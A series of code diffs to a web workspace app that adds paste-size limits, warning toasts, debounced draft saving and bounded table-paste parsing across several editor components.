  * The editor's reading column — the centered, padded surface both the live editor and the read-only
@@ -519,8 +526,21 @@ export function LoadedRichMarkdownEditor({
             awareness: collaboration.awareness,
             user: collaboration.user,
           },
+          pasteAdmission: {
+            maxResultBytes: PASTE_LIMITS.RICH_MARKDOWN_BYTES,
+            getCurrentText: () => lastSyncedBodyRef.current ?? '',
+            onRejected: warnRichMarkdownPasteLimit,
+          },
         })
-      : EXTENSIONS
+      : createMarkdownEditorExtensions({
+          placeholder: PLACEHOLDER,
+          embeds: true,
+          pasteAdmission: {
+            maxResultBytes: PASTE_LIMITS.RICH_MARKDOWN_BYTES,
+            getCurrentText: () => lastSyncedBodyRef.current ?? '',
+            onRejected: warnRichMarkdownPasteLimit,
+          },
+        })
   )
 
   const editor = useEditor({
@@ -535,6 +555,7 @@ export function LoadedRichMarkdownEditor({
       attributes: {
         class: 'rich-markdown-nodes rich-markdown-prose',
         'data-owned-shortcuts': 'Mod+K',
+        'data-paste-max-bytes': String(PASTE_LIMITS.RICH_MARKDOWN_BYTES),
       },
       handleKeyDown: (_view, event) => {
         const isSaveShortcut = (event.metaKey || event.ctrlKey) && event.key?.toLowerCase() === 's'

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/rich-markdown-field.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/rich-markdown-field.tsx
@@ -1,7 +1,8 @@
 'use client'
 
 import { useEffect, useLayoutEffect, useRef, useState } from 'react'
-import { ChipTextarea, chipFieldSurfaceClass, cn } from '@sim/emcn'
+import { ChipTextarea, chipFieldSurfaceClass, cn, toast } from '@sim/emcn'
+import { formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
 import type { JSONContent } from '@tiptap/core'
 import { EditorContent, useEditor } from '@tiptap/react'
 import { createMarkdownEditorExtensions } from './editor-extensions'
@@ -32,6 +33,12 @@ import './rich-markdown-editor.css'
  * container is how {@link EditorBubbleMenu} spells "portal to the body".
  */
 const BODY_PORTAL: React.RefObject<HTMLDivElement | null> = { current: null }
+
+function warnRichMarkdownPasteLimit() {
+  toast.warning('Paste is too large for rich-text editing', {
+    description: `Keep this document under ${formatPasteLimit(PASTE_LIMITS.RICH_MARKDOWN_BYTES)}, or import the content as a file.`,
+  })
+}
 
 interface RichMarkdownFieldProps {
   /** Current markdown value. Seeds the editor once on mount; external changes only apply while {@link isStreaming}. */
@@ -203,7 +210,16 @@ function LoadedRichMarkdownField({
   const [canonicalSeed] = useState(() => normalizeMarkdownContent(value))
 
   /** TipTap extensions are stateful — build them once per mount so each field gets its own placeholder. */
-  const [extensions] = useState(() => createMarkdownEditorExtensions({ placeholder }))
+  const [extensions] = useState(() =>
+    createMarkdownEditorExtensions({
+      placeholder,
+      pasteAdmission: {
+        maxResultBytes: PASTE_LIMITS.RICH_MARKDOWN_BYTES,
+        getCurrentText: () => lastSyncedBodyRef.current,
+        onRejected: warnRichMarkdownPasteLimit,
+      },
+    })
+  )
   const [initialContent] = useState<JSONContent>(() => parseMarkdownToDoc(initialSplit.body))
 
   const editor = useEditor({
@@ -231,6 +247,7 @@ function LoadedRichMarkdownField({
         ),
         // Claim ⌘K so the bubble-menu link editor wins over the global search palette.
         'data-owned-shortcuts': 'Mod+K',
+        'data-paste-max-bytes': String(PASTE_LIMITS.RICH_MARKDOWN_BYTES),
       },
       handlePaste: (view, event) => {
         const images = uploadImageRef.current ? extractImageFiles(event.clipboardData) : []
@@ -472,6 +489,7 @@ function RawMarkdownField({
         value={value}
         onChange={(event) => onChange(event.target.value)}
         onPaste={handlePaste}
+        data-paste-max-bytes={PASTE_LIMITS.RICH_MARKDOWN_BYTES}
         placeholder={placeholder}
         readOnly={isStreaming || lockedView}
         tabIndex={lockedView ? -1 : undefined}
@@ -493,6 +511,7 @@ function RawMarkdownField({
       value={value}
       onChange={(event) => onChange(event.target.value)}
       onPaste={handlePaste}
+      data-paste-max-bytes={PASTE_LIMITS.RICH_MARKDOWN_BYTES}
       placeholder={placeholder}
       error={error}
       viewOnly={lockedView}

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/text-editor.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/text-editor.tsx
@@ -593,18 +593,11 @@ export const TextEditor = memo(function TextEditor({
 
   const handleEditorPasteCapture = (event: ReactClipboardEvent<HTMLDivElement>) => {
     const pastedText = event.clipboardData.getData('text/plain')
-    const editor = monacoEditorRef.current
-    const model = editor?.getModel()
-    const selection = editor?.getSelection()
-    if (!pastedText || !model || !selection) return
+    if (!pastedText) return
 
     const admission = assessTextPaste({
       pastedText,
       maxPastedBytes: PASTE_LIMITS.TEXT_EDITOR_BYTES,
-      currentText: model.getValue(),
-      selectionStart: model.getOffsetAt(selection.getStartPosition()),
-      selectionEnd: model.getOffsetAt(selection.getEndPosition()),
-      maxResultBytes: PASTE_LIMITS.TEXT_EDITOR_BYTES,
     })
     if (admission.accepted) return
 

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/text-editor.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/text-editor.tsx
@@ -1,8 +1,16 @@
 'use client'
 
-import { memo, useCallback, useEffect, useRef, useState } from 'react'
+import {
+  memo,
+  type ClipboardEvent as ReactClipboardEvent,
+  useCallback,
+  useEffect,
+  useRef,
+  useState,
+} from 'react'
 import type { OnMount } from '@monaco-editor/react'
-import { cn } from '@sim/emcn'
+import { cn, toast } from '@sim/emcn'
+import { assessTextPaste, formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
 import type { editor as MonacoEditorTypes } from 'monaco-editor'
 import dynamic from 'next/dynamic'
 import {
@@ -583,6 +591,30 @@ export const TextEditor = memo(function TextEditor({
     [setDraftContent]
   )
 
+  const handleEditorPasteCapture = (event: ReactClipboardEvent<HTMLDivElement>) => {
+    const pastedText = event.clipboardData.getData('text/plain')
+    const editor = monacoEditorRef.current
+    const model = editor?.getModel()
+    const selection = editor?.getSelection()
+    if (!pastedText || !model || !selection) return
+
+    const admission = assessTextPaste({
+      pastedText,
+      maxPastedBytes: PASTE_LIMITS.TEXT_EDITOR_BYTES,
+      currentText: model.getValue(),
+      selectionStart: model.getOffsetAt(selection.getStartPosition()),
+      selectionEnd: model.getOffsetAt(selection.getEndPosition()),
+      maxResultBytes: PASTE_LIMITS.TEXT_EDITOR_BYTES,
+    })
+    if (admission.accepted) return
+
+    event.preventDefault()
+    event.stopPropagation()
+    toast.warning('Paste would make this file too large to edit', {
+      description: `Inline editing supports files up to ${formatPasteLimit(PASTE_LIMITS.TEXT_EDITOR_BYTES)}. Import or replace the file to keep larger content available without loading it into the editor.`,
+    })
+  }
+
   const isStreaming = isStreamInteractionLocked
   const isEditorReadOnly = isStreamInteractionLocked || !canEdit
 
@@ -634,6 +666,8 @@ export const TextEditor = memo(function TextEditor({
       <style>{FIND_TOOLTIP_FIX_CSS}</style>
       {showEditor && (
         <div
+          data-paste-max-bytes={PASTE_LIMITS.TEXT_EDITOR_BYTES}
+          onPasteCapture={handleEditorPasteCapture}
           style={showPreviewPane ? { width: `${splitPct}%`, flexShrink: 0 } : undefined}
           className={cn(
             'min-w-0',
@@ -648,6 +682,8 @@ export const TextEditor = memo(function TextEditor({
             theme={monacoTheme}
             options={{
               readOnly: isEditorReadOnly,
+              largeFileOptimizations: true,
+              maxTokenizationLineLength: 20_000,
               minimap: { enabled: false },
               scrollBeyondLastLine: false,
               wordWrap: 'on',

--- a/apps/sim/app/workspace/[workspaceId]/home/components/mothership-view/components/resource-content/components/terminal-session/terminal-session.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/mothership-view/components/resource-content/components/terminal-session/terminal-session.tsx
@@ -28,6 +28,7 @@ import {
 } from '@sim/emcn'
 import { TerminalWindow } from '@sim/emcn/icons'
 import { createLogger } from '@sim/logger'
+import { formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
 import { FitAddon } from '@xterm/addon-fit'
 import { Unicode11Addon } from '@xterm/addon-unicode11'
 import { WebLinksAddon } from '@xterm/addon-web-links'
@@ -668,8 +669,15 @@ const TerminalView = memo(function TerminalView({
 
   const pasteClipboard = useCallback(() => {
     void (async () => {
-      if (await pasteIntoTerminal(terminalId, scopeId)) {
+      const result = await pasteIntoTerminal(terminalId, scopeId)
+      if (result === true) {
         terminalRef.current?.focus()
+        return
+      }
+      if (result === 'too-large') {
+        toast.warning('Paste is too large for the terminal', {
+          description: `Paste up to ${formatPasteLimit(PASTE_LIMITS.TERMINAL_BYTES)} at once, or send the content through a file.`,
+        })
         return
       }
       toast.error('Could not paste from the clipboard. Press ⌘V to paste.')
@@ -711,6 +719,7 @@ const TerminalView = memo(function TerminalView({
     <>
       <div
         ref={hostRef}
+        data-paste-max-bytes={PASTE_LIMITS.TERMINAL_BYTES}
         onPointerDown={() => terminalRef.current?.focus()}
         onContextMenu={openMenu}
         className={cn('absolute inset-0 pt-[7px] pr-2 pb-1 pl-1.5', !active && 'hidden')}

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/prompt-editor.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/prompt-editor.tsx
@@ -257,7 +257,6 @@ export function PromptEditor({
           placeholder={placeholder}
           aria-label={ariaLabel}
           rows={1}
-          maxLength={PASTE_LIMITS.CHAT_CHARACTERS}
           className={cn(
             TEXTAREA_BASE_CLASSES,
             usePlainTextMode && '!text-[var(--text-primary)]',

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/prompt-editor.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/prompt-editor.tsx
@@ -2,6 +2,7 @@
 
 import { useCallback, useEffect, useLayoutEffect, useMemo, useRef, useState } from 'react'
 import { cn } from '@sim/emcn'
+import { PASTE_LIMITS, PASTE_RENDER_THRESHOLDS } from '@sim/utils/paste'
 import { ContextMentionIcon } from '@/app/workspace/[workspaceId]/home/components/context-mention-icon'
 import {
   OVERLAY_CLASSES,
@@ -78,6 +79,7 @@ export function PromptEditor({
    * Un-warming on blur would just re-open the race on the next focus.
    */
   const [hasFocused, setHasFocused] = useState(false)
+  const usePlainTextMode = value.length > PASTE_RENDER_THRESHOLDS.ENHANCED_TEXT_CHARACTERS
 
   /**
    * Autosize: grow the textarea to its full content height; the scroller caps
@@ -94,9 +96,10 @@ export function PromptEditor({
     const scroller = scrollerRef.current
     if (scroller) scroller.style.height = `${scroller.offsetHeight}px`
     textarea.style.height = 'auto'
-    textarea.style.height = `${textarea.scrollHeight}px`
+    textarea.style.height = `${usePlainTextMode ? Math.min(textarea.scrollHeight, 240) : textarea.scrollHeight}px`
+    textarea.style.overflowY = usePlainTextMode ? 'auto' : 'hidden'
     if (scroller) scroller.style.height = ''
-  }, [textareaRef])
+  }, [textareaRef, usePlainTextMode])
 
   useLayoutEffect(() => {
     autosize()
@@ -151,6 +154,7 @@ export function PromptEditor({
   )
 
   const overlayContent = useMemo(() => {
+    if (usePlainTextMode) return null
     const contexts = editor.contexts
 
     if (!value) {
@@ -216,7 +220,7 @@ export function PromptEditor({
     }
 
     return elements.length > 0 ? elements : <span>{'\u00A0'}</span>
-  }, [value, editor.contexts])
+  }, [value, editor.contexts, usePlainTextMode])
 
   return (
     <div
@@ -228,9 +232,11 @@ export function PromptEditor({
           height and the overlay fills it via `inset-0`, so both are flow
           children of the same scroller and co-scroll natively. */}
       <div className='relative'>
-        <div className={OVERLAY_CLASSES} aria-hidden='true'>
-          {overlayContent}
-        </div>
+        {!usePlainTextMode && (
+          <div className={OVERLAY_CLASSES} aria-hidden='true'>
+            {overlayContent}
+          </div>
+        )}
 
         <textarea
           ref={textareaRef}
@@ -242,6 +248,8 @@ export function PromptEditor({
           }
           onFocus={readOnly ? undefined : () => setHasFocused(true)}
           onPaste={readOnly ? undefined : editor.handlePaste}
+          data-paste-max-bytes={PASTE_LIMITS.CHAT_BYTES}
+          data-paste-max-characters={PASTE_LIMITS.CHAT_CHARACTERS}
           onCopy={editor.handleCopy}
           onCut={readOnly ? undefined : editor.handleCut}
           onSelect={readOnly ? undefined : editor.handleSelectAdjust}
@@ -249,7 +257,12 @@ export function PromptEditor({
           placeholder={placeholder}
           aria-label={ariaLabel}
           rows={1}
-          className={cn(TEXTAREA_BASE_CLASSES, readOnly && 'cursor-default caret-transparent')}
+          maxLength={PASTE_LIMITS.CHAT_CHARACTERS}
+          className={cn(
+            TEXTAREA_BASE_CLASSES,
+            usePlainTextMode && '!text-[var(--text-primary)]',
+            readOnly && 'cursor-default caret-transparent'
+          )}
         />
       </div>
 

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.test.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.test.tsx
@@ -11,6 +11,7 @@ vi.mock('@/blocks/integration-matcher', () => ({
   getIntegrationMatcher: () => ({ regex: null, byName: new Map() }),
 }))
 
+import { SIM_SELECTION_MIME } from '@/lib/copilot/chat/selection-clipboard'
 import type { PlusMenuHandle } from '@/app/workspace/[workspaceId]/home/components/user-input/components/constants'
 import {
   type UsePromptEditorProps,
@@ -278,6 +279,42 @@ describe('usePromptEditor context insertion', () => {
     unmount()
   })
 
+  it('pastes a large table selection as a compact context chip', () => {
+    vi.spyOn(window, 'requestAnimationFrame').mockImplementation((callback) => {
+      callback(0)
+      return 1
+    })
+    const context = {
+      kind: 'table_selection',
+      tableId: 'table-1',
+      tableName: 'Large table',
+      rowIds: ['row-1'],
+      label: 'Large table (1 row)',
+    } satisfies ChatContext
+    const { result, textarea, unmount } = renderPromptEditor({ workspaceId: 'ws-1' })
+    const preventDefault = vi.fn()
+
+    act(() => {
+      result().handlePaste({
+        currentTarget: textarea,
+        clipboardData: {
+          getData: (type: string) => {
+            if (type === 'text/plain') return 'x'.repeat(1_000_001)
+            if (type === SIM_SELECTION_MIME) return JSON.stringify(context)
+            return ''
+          },
+        },
+        preventDefault,
+      } as unknown as React.ClipboardEvent<HTMLTextAreaElement>)
+    })
+
+    expect(preventDefault).toHaveBeenCalledOnce()
+    expect(result().value).toBe('@Large table (1 row) ')
+    expect(result().contexts).toEqual([context])
+
+    unmount()
+  })
+
   it('suffixes duplicate visible labels so two browser selections coexist', () => {
     vi.spyOn(window, 'requestAnimationFrame').mockImplementation((callback) => {
       callback(0)
@@ -295,7 +332,9 @@ describe('usePromptEditor context insertion', () => {
       label: 'Browser · Another page title',
       selection: { text: 'second selection', url: 'https://example.com' },
     } satisfies ChatContext
-    const { result, textarea, unmount } = renderPromptEditor({ workspaceId: 'ws-1' })
+    const { result, textarea, unmount } = renderPromptEditor({
+      workspaceId: 'ws-1',
+    })
 
     act(() => {
       result().insertContext(first)

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.ts
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.ts
@@ -991,26 +991,6 @@ export function usePromptEditor({
   const handlePaste = useCallback((e: React.ClipboardEvent<HTMLTextAreaElement>) => {
     const textarea = e.currentTarget
     const pastedPlainText = e.clipboardData?.getData('text/plain') ?? ''
-    if (pastedPlainText) {
-      const admission = assessTextPaste({
-        pastedText: pastedPlainText,
-        maxPastedBytes: PASTE_LIMITS.CHAT_BYTES,
-        maxPastedCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
-        currentText: textarea.value,
-        selectionStart: textarea.selectionStart,
-        selectionEnd: textarea.selectionEnd,
-        maxResultBytes: PASTE_LIMITS.CHAT_BYTES,
-        maxResultCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
-      })
-      if (!admission.accepted) {
-        e.preventDefault()
-        toast.warning('Paste is too large for a message', {
-          description: `Messages support up to ${PASTE_LIMITS.CHAT_CHARACTERS.toLocaleString()} characters. Attach the content as a file to send more without slowing the editor.`,
-        })
-        return
-      }
-    }
-
     // A selection copied from a file/table (Cmd+C) carries its context on a
     // custom clipboard type — paste it as a reference chip instead of plain text.
     // Registers via `addContext` (not the notified path) so paste never opens a
@@ -1037,6 +1017,26 @@ export function usePromptEditor({
       setValueState(textarea.value)
       requestAnimationFrame(() => textarea.setSelectionRange(caret, caret))
       return
+    }
+
+    if (pastedPlainText) {
+      const admission = assessTextPaste({
+        pastedText: pastedPlainText,
+        maxPastedBytes: PASTE_LIMITS.CHAT_BYTES,
+        maxPastedCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
+        currentText: textarea.value,
+        selectionStart: textarea.selectionStart,
+        selectionEnd: textarea.selectionEnd,
+        maxResultBytes: PASTE_LIMITS.CHAT_BYTES,
+        maxResultCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
+      })
+      if (!admission.accepted) {
+        e.preventDefault()
+        toast.warning('Paste is too large for a message', {
+          description: `Messages support up to ${PASTE_LIMITS.CHAT_CHARACTERS.toLocaleString()} characters. Attach the content as a file to send more without slowing the editor.`,
+        })
+        return
+      }
     }
 
     // Portable chip links (`[label](sim:kind/id)`) re-create their chip on

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.ts
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/components/prompt-editor/use-prompt-editor.ts
@@ -1,4 +1,6 @@
 import { useCallback, useEffect, useMemo, useRef, useState } from 'react'
+import { toast } from '@sim/emcn'
+import { assessTextPaste, PASTE_LIMITS, PASTE_RENDER_THRESHOLDS } from '@sim/utils/paste'
 import {
   attachSelectionContextToClipboard,
   readSelectionContextFromClipboard,
@@ -733,7 +735,10 @@ export function usePromptEditor({
           previousValue,
           nextValue: finalValue,
         })
-      } else if (nextValue.length > previousValue.length + 1) {
+      } else if (
+        nextValue.length > previousValue.length + 1 &&
+        nextValue.length <= PASTE_RENDER_THRESHOLDS.ENHANCED_TEXT_CHARACTERS
+      ) {
         // Multi-char insertion (paste, drag-drop, IME commit) — bulk convert all
         // matches and rewrite the textarea via `setRangeText` to keep the edit
         // in a single native undo step.
@@ -985,6 +990,26 @@ export function usePromptEditor({
 
   const handlePaste = useCallback((e: React.ClipboardEvent<HTMLTextAreaElement>) => {
     const textarea = e.currentTarget
+    const pastedPlainText = e.clipboardData?.getData('text/plain') ?? ''
+    if (pastedPlainText) {
+      const admission = assessTextPaste({
+        pastedText: pastedPlainText,
+        maxPastedBytes: PASTE_LIMITS.CHAT_BYTES,
+        maxPastedCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
+        currentText: textarea.value,
+        selectionStart: textarea.selectionStart,
+        selectionEnd: textarea.selectionEnd,
+        maxResultBytes: PASTE_LIMITS.CHAT_BYTES,
+        maxResultCharacters: PASTE_LIMITS.CHAT_CHARACTERS,
+      })
+      if (!admission.accepted) {
+        e.preventDefault()
+        toast.warning('Paste is too large for a message', {
+          description: `Messages support up to ${PASTE_LIMITS.CHAT_CHARACTERS.toLocaleString()} characters. Attach the content as a file to send more without slowing the editor.`,
+        })
+        return
+      }
+    }
 
     // A selection copied from a file/table (Cmd+C) carries its context on a
     // custom clipboard type — paste it as a reference chip instead of plain text.
@@ -1018,7 +1043,7 @@ export function usePromptEditor({
     // paste-back. Rewrite each link span to its `@label ` token (the trailing
     // space is REQUIRED so useContextManagement's sync effect doesn't purge the
     // freshly-added context) and register the contexts directly.
-    const pastedText = e.clipboardData?.getData('text/plain') ?? ''
+    const pastedText = pastedPlainText
     const links = parseChipLinks(pastedText)
     if (links.length > 0) {
       e.preventDefault()

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/user-input.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/user-input.tsx
@@ -39,7 +39,7 @@ import type { AttachedFile } from '@/app/workspace/[workspaceId]/w/[workflowId]/
 import { mentionifyIntegrations } from '@/blocks/integration-matcher'
 import { useSettingsNavigation } from '@/hooks/use-settings-navigation'
 import { type SpeechToTextError, useSpeechToText } from '@/hooks/use-speech-to-text'
-import { useMothershipDraftsStore } from '@/stores/mothership-drafts/store'
+import { type DraftPayload, useMothershipDraftsStore } from '@/stores/mothership-drafts/store'
 import type { ChatContext } from '@/stores/panel'
 
 export type { FileAttachmentForApi } from '@/app/workspace/[workspaceId]/home/types'
@@ -201,6 +201,8 @@ const UserInputImpl = forwardRef<UserInputHandle, UserInputProps>(function UserI
   }, []) // eslint-disable-line react-hooks/exhaustive-deps -- intentional mount-only restore
 
   const isFirstSaveRef = useRef(true)
+  const draftSaveTimerRef = useRef<number | null>(null)
+  const pendingDraftRef = useRef<{ key: string; payload: DraftPayload } | null>(null)
   useEffect(() => {
     if (isFirstSaveRef.current) {
       isFirstSaveRef.current = false
@@ -217,12 +219,31 @@ const UserInputImpl = forwardRef<UserInputHandle, UserInputProps>(function UserI
         size: f.size,
         ...(f.path ? { path: f.path } : {}),
       }))
-    useMothershipDraftsStore.getState().setDraft(draftScopeKeyRef.current, {
-      text: editor.value,
-      fileAttachments: fileAttachments.length > 0 ? fileAttachments : undefined,
-      contexts: editor.contexts.length > 0 ? editor.contexts : undefined,
-    })
+    pendingDraftRef.current = {
+      key: draftScopeKeyRef.current,
+      payload: {
+        text: editor.value,
+        fileAttachments: fileAttachments.length > 0 ? fileAttachments : undefined,
+        contexts: editor.contexts.length > 0 ? editor.contexts : undefined,
+      },
+    }
+    if (draftSaveTimerRef.current !== null) window.clearTimeout(draftSaveTimerRef.current)
+    draftSaveTimerRef.current = window.setTimeout(() => {
+      const pending = pendingDraftRef.current
+      if (pending) useMothershipDraftsStore.getState().setDraft(pending.key, pending.payload)
+      pendingDraftRef.current = null
+      draftSaveTimerRef.current = null
+    }, 200)
   }, [editor.value, files.attachedFiles, editor.contexts])
+
+  useEffect(
+    () => () => {
+      if (draftSaveTimerRef.current !== null) window.clearTimeout(draftSaveTimerRef.current)
+      const pending = pendingDraftRef.current
+      if (pending) useMothershipDraftsStore.getState().setDraft(pending.key, pending.payload)
+    },
+    []
+  )
 
   const onContextRemoveRef = useRef(onContextRemove)
   onContextRemoveRef.current = onContextRemove

--- a/apps/sim/app/workspace/[workspaceId]/home/components/user-input/user-input.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/home/components/user-input/user-input.tsx
@@ -536,6 +536,11 @@ const UserInputImpl = forwardRef<UserInputHandle, UserInputProps>(function UserI
     )
     currentEditor.clear()
     sttPrefixRef.current = ''
+    if (draftSaveTimerRef.current !== null) {
+      window.clearTimeout(draftSaveTimerRef.current)
+      draftSaveTimerRef.current = null
+    }
+    pendingDraftRef.current = null
     if (draftScopeKeyRef.current) {
       useMothershipDraftsStore.getState().clearDraft(draftScopeKeyRef.current)
     }

--- a/apps/sim/app/workspace/[workspaceId]/layout.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/layout.tsx
@@ -1,4 +1,3 @@
-import { ToastProvider } from '@sim/emcn'
 import { dehydrate, HydrationBoundary } from '@tanstack/react-query'
 import { cookies } from 'next/headers'
 import { redirect } from 'next/navigation'
@@ -68,25 +67,23 @@ export default async function WorkspaceLayout({
           viewerIsHostOrganizationMember={hostContext.viewer.isHostOrganizationMember}
           initialOrgSettings={initialOrgSettings}
         >
-          <ToastProvider>
-            <DesktopOAuthConnectListener />
-            <SettingsLoader />
-            <ProviderModelsLoader />
-            <CustomBlocksLoader />
-            <BlockVisibilityLoader />
-            <GlobalCommandsProvider>
-              <div className='flex h-screen w-full flex-col overflow-hidden bg-[var(--surface-1)]'>
-                <ImpersonationBanner />
-                <SessionExpired />
-                <WorkspacePermissionsProvider>
-                  <WorkspaceScopeSync />
-                  <WorkspaceChrome initialSidebarCollapsed={initialSidebarCollapsed}>
-                    {children}
-                  </WorkspaceChrome>
-                </WorkspacePermissionsProvider>
-              </div>
-            </GlobalCommandsProvider>
-          </ToastProvider>
+          <DesktopOAuthConnectListener />
+          <SettingsLoader />
+          <ProviderModelsLoader />
+          <CustomBlocksLoader />
+          <BlockVisibilityLoader />
+          <GlobalCommandsProvider>
+            <div className='flex h-screen w-full flex-col overflow-hidden bg-[var(--surface-1)]'>
+              <ImpersonationBanner />
+              <SessionExpired />
+              <WorkspacePermissionsProvider>
+                <WorkspaceScopeSync />
+                <WorkspaceChrome initialSidebarCollapsed={initialSidebarCollapsed}>
+                  {children}
+                </WorkspaceChrome>
+              </WorkspacePermissionsProvider>
+            </div>
+          </GlobalCommandsProvider>
         </BrandingProvider>
       </WorkspaceHostProvider>
     </HydrationBoundary>

--- a/apps/sim/app/workspace/[workspaceId]/settings/components/secrets/components/secrets-manager/secrets-manager.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/settings/components/secrets/components/secrets-manager/secrets-manager.tsx
@@ -39,7 +39,7 @@ const logger = createLogger('SecretsManager')
 
 const GRID_COLS = 'grid grid-cols-[minmax(0,1fr)_8px_minmax(0,1fr)_auto] items-center'
 const COL_SPAN_ALL = 'col-span-4'
-const MAX_ENV_PASTE_ROWS = 1_000
+const MAX_ENV_PASTE_ROWS = 10_000
 
 /** Copies a secret's name and confirms with a toast. */
 function copyName(key: string) {

--- a/apps/sim/app/workspace/[workspaceId]/settings/components/secrets/components/secrets-manager/secrets-manager.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/settings/components/secrets/components/secrets-manager/secrets-manager.tsx
@@ -3,6 +3,7 @@
 import { useCallback, useEffect, useId, useMemo, useRef, useState } from 'react'
 import { ChipInput, cn, toast } from '@sim/emcn'
 import { createLogger } from '@sim/logger'
+import { countPasteRows } from '@sim/utils/paste'
 import { useQueryClient } from '@tanstack/react-query'
 import { useParams, useRouter } from 'next/navigation'
 import { canMutateWorkspaceSettingsSection } from '@/components/settings/navigation'
@@ -38,6 +39,7 @@ const logger = createLogger('SecretsManager')
 
 const GRID_COLS = 'grid grid-cols-[minmax(0,1fr)_8px_minmax(0,1fr)_auto] items-center'
 const COL_SPAN_ALL = 'col-span-4'
+const MAX_ENV_PASTE_ROWS = 1_000
 
 /** Copies a secret's name and confirms with a toast. */
 function copyName(key: string) {
@@ -713,6 +715,14 @@ export function SecretsManager() {
     const text = e.clipboardData.getData('text').trim()
     if (!text) return
 
+    if (countPasteRows(text, MAX_ENV_PASTE_ROWS) > MAX_ENV_PASTE_ROWS) {
+      e.preventDefault()
+      toast.warning('Paste has too many secrets', {
+        description: `Add up to ${MAX_ENV_PASTE_ROWS.toLocaleString()} rows at once.`,
+      })
+      return
+    }
+
     const lines = text.split(/\r?\n/).filter((line) => line.trim())
     if (lines.length === 0) return
 
@@ -748,6 +758,14 @@ export function SecretsManager() {
   const handleWorkspacePaste = (e: React.ClipboardEvent<HTMLInputElement>, _index: number) => {
     const text = e.clipboardData.getData('text').trim()
     if (!text) return
+
+    if (countPasteRows(text, MAX_ENV_PASTE_ROWS) > MAX_ENV_PASTE_ROWS) {
+      e.preventDefault()
+      toast.warning('Paste has too many secrets', {
+        description: `Add up to ${MAX_ENV_PASTE_ROWS.toLocaleString()} rows at once.`,
+      })
+      return
+    }
 
     const lines = text.split(/\r?\n/).filter((line) => line.trim())
     if (lines.length === 0) return

--- a/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-grid.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/tables/[tableId]/components/table-grid/table-grid.tsx
@@ -7,6 +7,7 @@ import { Loader, TableX } from '@sim/emcn/icons'
 import { createLogger } from '@sim/logger'
 import type { TableCellSelection } from '@sim/realtime-protocol/table-presence'
 import { getErrorMessage } from '@sim/utils/errors'
+import { assessTextPaste, formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
 import { useVirtualizer } from '@tanstack/react-virtual'
 import { useParams } from 'next/navigation'
 import { usePostHog } from 'posthog-js/react'
@@ -64,6 +65,7 @@ import { ADD_COL_WIDTH, COL_WIDTH, SELECTION_TINT_BG } from './constants'
 import { DataRow } from './data-row'
 import { ColumnHeaderMenu, WorkflowGroupMetaCell } from './headers'
 import { RemoteSelectionOverlay } from './remote-selection-overlay'
+import { exceedsTablePasteRowLimit, parseBoundedTsv } from './table-paste'
 import { AddRowButton, SelectAllCheckbox, TableColGroup } from './table-primitives'
 import type { DisplayColumn } from './types'
 import {
@@ -3588,15 +3590,28 @@ export function TableGrid({
       const text = e.clipboardData?.getData('text/plain')
       if (!text) return
 
-      const pasteRows = text
-        .split(/\r?\n/)
-        .filter((line, idx, arr) => !(idx === arr.length - 1 && line === ''))
-        .map((line) => line.split('\t'))
-
-      if (pasteRows.length === 0) return
+      const admission = assessTextPaste({
+        pastedText: text,
+        maxPastedBytes: PASTE_LIMITS.STRUCTURED_BYTES,
+      })
+      if (!admission.accepted) {
+        toast.warning('Paste is too large for the table editor', {
+          description: `Paste up to ${formatPasteLimit(PASTE_LIMITS.STRUCTURED_BYTES)} at once, or use CSV import for larger datasets.`,
+        })
+        return
+      }
+      if (exceedsTablePasteRowLimit(text, TABLE_LIMITS.MAX_BATCH_INSERT_SIZE)) {
+        toast.warning('Paste has too many rows', {
+          description: `Paste up to ${TABLE_LIMITS.MAX_BATCH_INSERT_SIZE.toLocaleString()} rows at once, or use CSV import for larger datasets.`,
+        })
+        return
+      }
 
       const currentCols = columnsRef.current
       const currentRows = rowsRef.current
+      const parsedPaste = parseBoundedTsv(text, currentCols.length - currentAnchor.colIndex)
+      const pasteRows = parsedPaste.rows
+      if (pasteRows.length === 0) return
 
       const undoCells: Array<{ rowId: string; data: Record<string, unknown> }> = []
       const updateBatch: Array<{ rowId: string; data: Record<string, unknown> }> = []
@@ -3687,10 +3702,12 @@ export function TableGrid({
         )
       }
 
-      const maxPasteCols = Math.max(...pasteRows.map((pr) => pr.length))
       setSelectionFocus({
